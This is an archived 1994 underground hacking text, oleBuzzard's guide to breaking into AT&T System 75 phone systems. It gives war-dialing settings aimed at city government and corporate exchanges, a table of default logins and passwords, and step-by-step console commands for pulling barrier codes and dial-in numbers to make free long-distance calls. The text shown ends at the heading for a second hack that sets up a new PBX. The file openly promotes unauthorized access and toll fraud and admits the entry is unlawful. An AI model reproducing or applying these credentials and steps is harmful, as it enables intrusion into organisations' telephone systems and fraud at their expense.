SuperHack

home *** CD-ROM | disk | FTP | other *** search

/ SuperHack / SuperHack CD.bin / Hack / MISC / SYSTEM75.ZIP / SYSTEM75.OB

Wrap

Text File | 1996-04-25 | 16.1 KB | 345 lines

####################################################### # # # oleBuzzard's %%%%%%%%%%%%%% %%%%%%%%%% # # %%%%%%%%%%%%%% %%%%%%%%%% # # Compleat Guide To %%%%%% %%%% # # %%%%%% %%%% # # ### ## ## ## ### %%%%%%%%%% # # ## ##### ## ## ## ## ##### %%%%%%%%% # # ### ### ### ### ### ### %%%% # # ##### ## #### #### ##### ## %%%% # # ### #### #### ### %%%%%% # # # ###########################################05-Jan-94### INTRODUCTION/SCORN You know, I've always hated 'Elitism' in the BBS world. For me, the reason why I got into BBSing was because of my enthusiasm for computers and my obsession with information. I thrive off of knowledge and reap the benefits. My only obstacle in life are those I have encountered who felt I was not worthy of the information I sought. These people make me sick, especially the ones who know so very little yet think they know oh so much. Which brings me to todays topic: System 75. You want to know how you can tell a real lamer? Ask him for information about System 75. 9 times out of 10, the person will scoff at you and act as if he was the head of the Joint Chiefs of Staff and you were a Private asking HIM about covert maneuvers in the Asian Theatre. This attitude most apparently reveals itself in almost every file on System 75 I have ever read. I have yet to read a file on System 75 (including the one in Phrack 41) that included even one default, or even information on how to find a Sys75. Its a fucking joke and not a very funny one. Although Sys75s are very intereseting systems to hack, they are hardly worthy of the coveted status they receive. (Of course, in my opinion no information is worthy of coveted status, but thats another story.) The truth is Sys75s are great systems because they are relativley easy to learn and manipulate and they are one of the only systems that in and of themselves involve a blending of hacking and phreaking. This file will aid you in your first attempt at Sys75 and hopefully give you an adequate and useful introduction to one of the undergrounds favorite systems. SYSTEM 75 INFO System 75 is a hardware/software based multi-purpose communications system offering a wide range of business applications, including Voice Mail (AUDIX), networking (ISDN) and long-distance teleconferencing (PBX!!!) For purposes of this file we will focus on Sys75s Long-Distance teleconferencing capabilities as made possible by the Public Branch Exchange. System 75s have the ability to establish a new PBX or retreive all the information about an existing PBX. In either case, if you can accomplish the task at hand - retreiving PBX info or establishing a new PBX - the end result is the same, free phone calls -- a valuable commodity in the realm of underground communications. This is why System 75s are so popular and information on them so coveted. Unfortunatley if you don't know what you're looking for or what you're doing you won't get far. Thats what this file is for. To Aid you in finding a Sys75 and help you to correctly manipulate the system once you've found it. (You can thank me later.) HACKING SYSTEM 75 In the following pages you will see many screens from an ACTUAL System 75 (ooo!) The screens will be within various steps of either retrieving information on an existing PBX or on establishing a new PBX. Some useful but nonessential information may be cut out and as well some information may be ommitted for security reasons. But rest assured there will be more than enough information retained to help you establish your very own PBX. PART 1: Finding and Identifying a System 75 Well finding and identifying a System 75 are relativley easy tasks so I won't spend much time on it, but I will note that finding and identifying, although complementary, are two different tasks. I have often seen information on identifying a Sys75, but I have never seen anything on how to actually find one. If you can't find one, who cares how to identify one!?! Finding A System 75 When trying to find a System 75, I suggest you employ a quality scanner that is reliable and bug free. My experience is that very few scanners meet this criteria and instead most have glitches to the point that they are all but useless. Of course nothing is without exception. There are a few scanners I have found to be relativley reliable. These include ToneLoc .098, BlueBeep .007 and on the Macintosh, Holy War Dialer v2.0. Once you have found a reliable scanner I suggest you configure it with the following parameters to ensure optimal scan speed without missing a System and to cut down on the amount of unnecessary scanning. Baud Rate: 2400 [Scanning for all baud rates UP TO 2400 inclusive] Time Interval: approx. 18sec. [Different scanners, different count but 18 seconds in real time is about right] Starting #: xxx-0000 [ALWAYS start here] Ending #: xxx-0500 [I have never found a Sys75 past 0500 and in fact most I have found have been in the xxx-00xx range or in other words, with in the first 99 numbers of an exchange.] I would suggest looking for a Sys75 in your citys Municipal Government exchange first. Where I live all city and county facilities with in the city (courthouse, police, PUC, etc) have the same exchange. Start your scan in this exchange(s) because there is almost certainly System 75 set-up. Once you find a Sys75 in an exchange move to another exchange to look for the next one. Some have argued (correctly so) that there are sometimes more than one Sys75 in an exchange. Although they are correct I have found far more Sys75s by searching the first 500 numbers of many exchanges than 9999 numbers in a few. Also, only once have I found more than one Sys75 in an exchange. Once you have exhausted your scan of the municipal exchange(s) I suggest moving to an exchange assigned to a large company. In many cases there are company facilities so large they are assigned their own exchange. These facilities almost certainly have a Sys75 set up, so check it out. Examples of facilities I know of that have their own exchange and a Sys75 within that exchange are IBM, HP, DEC and KAMAN Sciences in the city of You Wishville. My final tip on finding a System 75 is to scan at night. It cuts down on the possibility of hitting a system which is in use and thus has the line occupied. Of course if all you guys hack at night then the line will be busy anyway and it won't matter, so.... Identifying A System 75 You'll be able to identify a System 75 by the following information which appears when you have connected to one. PROTOCOL: NONE CONNECT 1200 [1200 baud is a good indicator that you have found a Sys75] KEYBOARD LOCKED, WAIT FOR LOGIN [Short pause here] Login: Ok, well thats what a System 75 looks like when you've first connected. You don't have to hit any special keystrokes at this point and all entries end with <CR>. PART 2: Logging In Passwords, password, passwords! The assholes never give you the fuckin passwords. What the fuck does a tutorial on System 75 do if it doesn't include a password so you can actually do something?!? Not much in my opinion. Well Sys75s have two types of passwords. Those which can alter information and those which can only browse information. The following is a list of ALL Sys75 defaults. Although the list is complete there is no gaurantee that all or any of them work. Also, because the access for the defaults is assignable you have to check for yourself to see which defaults alter and which defaults can only browse. The information I am providing is for the last Sys75 I hacked. System 75 Default Accounts Login Password Type ----- -------- ---- bcim bcimpw didn't work bcms bcms didn't work blue bluepw altering browse looker browsing craft craftpw didn't work cust custpw browsing enquiry enquirypw browsing inads inads didn't work init initpw didn't work locate locatepw browsing maint rwmaint altering rcust rcustpw altering support supportpw didn't work tech field altering Once you've logged in you will be prompted to enter the Terminal Type. Terminal Type (513, 4410, 4425): [513] 513 \ Enter 513, thats the default. And then you will see the world famous login screen: _____________________________________________________________________________ Copyright (c) 1986 - AT&T Unpublished & Not for Publication All Rights Reserved _____________________________________________________________________________ enter command: _ PART 3: Hack 1 - Retreiving PBX Information The following information is on how to retreive PBX info for your own use. This is the safest method of hacking Sys75 because it doesn't require altering ANY information. This is relativley easy so I'll go through it quick. You will be given the prompt, enter command: You can basically enter everything I enter word for word to make the hack. enter command: disp rem [short for display remote-access] _____________________________________________________________________________ display remote-access Page 1 of 1 Remote Access Extension: 2531 Barrier Code Length: 5 \ Authorization Code Required? n PBX already established BARRIER CODE ASSIGNMENTS (Enter up to 10) Barrier Code COR COS Barrier Code COR COS 1: 49138 1 1 6: 1 1 2: \ 1 1 7: 1 1 3: Code 1 1 8: 1 1 4: 1 1 9: 1 1 5: 1 1 10: 1 1 In this (rare) instance we have found a Sys75 with a PBX already set up. All we have to do is find the corresponding trunk-group and get the dial-in number. The trunk group contains all the routing information for the trunk the PBX goes through. * NOTE * Write down the Barrier Code. You will need it! (duh!) To find the trunk that corresponds to the established PBX we will be looking for a trunk group with a Night Service extension the same as the Remote Access Extension (from disp rem). enter command: disp trunk 1 _____________________________________________________________________________ display trunk-group 1 Page 1 of 5 Group Number: 1 Group Type: did SMDR Reports? y Group Name: Intra-Lata COR: 1 TAC: 50 Data Restriction? n MIS Measured? n Auth Code? n q TRUNK PARAMETERS Trunk Type: wink-start Incoming Rotary Timeout(sec): 5 Incoming Dial Type: tone Trunk Termination: 600ohm Disconnect Timing(msec): 300 Digit Treatment: Digits: Expected digits: ACA Assignment? n Maintenance Tests? y Answer Supervision Timeout: ___________________________________________________________________________ Well this ain't it because this one doesn't even contain a Night Service. A Night Service is important because it determines whether or not a PBX is 24 hour or not. No Night Service means during business hours only. For purposes of this hack a Night Service is important because it will identify the correct trunk. Because there is no Night Service we won't bother to check the other four pages (Note the top of the screen says Page 1 of 5). Normally we would check the other pages and we would do so by hitting ESC [U for next page. Instead we'll cancel the last command and check some other trunks. At the prompt enter ESC Ow Go through all the trunks until you find one with a corresponding Night Service. The process for going through trunks is simple. Enter disp trunk x (where x is a number from 1 to 99) and hit <CR>. If you don't see a Night Service or if you see a Night Service and the extension following the Night Service doesn't match the Remote Access Extension then hit ESC Ow and goto the next trunk and repeat the process. enter command: disp trunk 6 _____________________________________________________________________________ display trunk-group 6 Page 1 of 5 Group Number: 6 Group Type: co SMDR Reports? y Group Name: Intra-Lata COR: 7 TAC: 25 Direction: two-way Outgoing Display? n Data Restriction? n MIS Measured? n Dial Access? y Busy Threshold: 1 Night Service: 2531 Queue Length: 1 Abandoned Call Search? n Incoming Destination: Comm Type: voice Auth Code? n Digit Absorption List: Prefix-1? y Restriction: toll Allowed Calls List? y TRUNK PARAMETERS Trunk Type: loop-start Outgoing Dial Type: tone Trunk Termination: rc Disconnect Timing(msec): 500 ACA Assignment? n Maintenance Tests? y Answer Supervision Timeout: Suppress # Outpulsing? n _____________________________________________________________________________ Well we found it. Notice the Night Service and extension. This group has Night Service and it has an extension the same as the remote-access extension. Next all we need to do is find out the dial-in number. At the prompt enter: ESC [U for the next page. _____________________________________________________________________________ display trunk-group 6 Page 2 of 5 GROUP MEMBER ASSIGNMENTS Port Name Mode Type Answer Delay 1: D2003 635xxxx 2: D2004 635xxxx 3: D2005 635xxxx 4: D2006 635xxxx 5: D2002 635xxxx 6: 7: 8: 9: 10: 11: 12: 13: 14: 15: _____________________________________________________________________________ Well I decided not to include the complete dial-in number, but you get the idea. All you have to do at this point is write down ALL the dial-in numbers and logoff. Type ESC Ow to cancel (exit) and at the prompt type: logoff to (guess.) Now dial one of the dial-in numbers and enter the Barrier Code+9+1+ACN and thats it. No changes made and you've only committed one count of unlawful entry of a computer system (10 days with work release tops). Now you have an unabused PBX for personal use or trade. PART 4: Hack 2 - Setting Up A PBX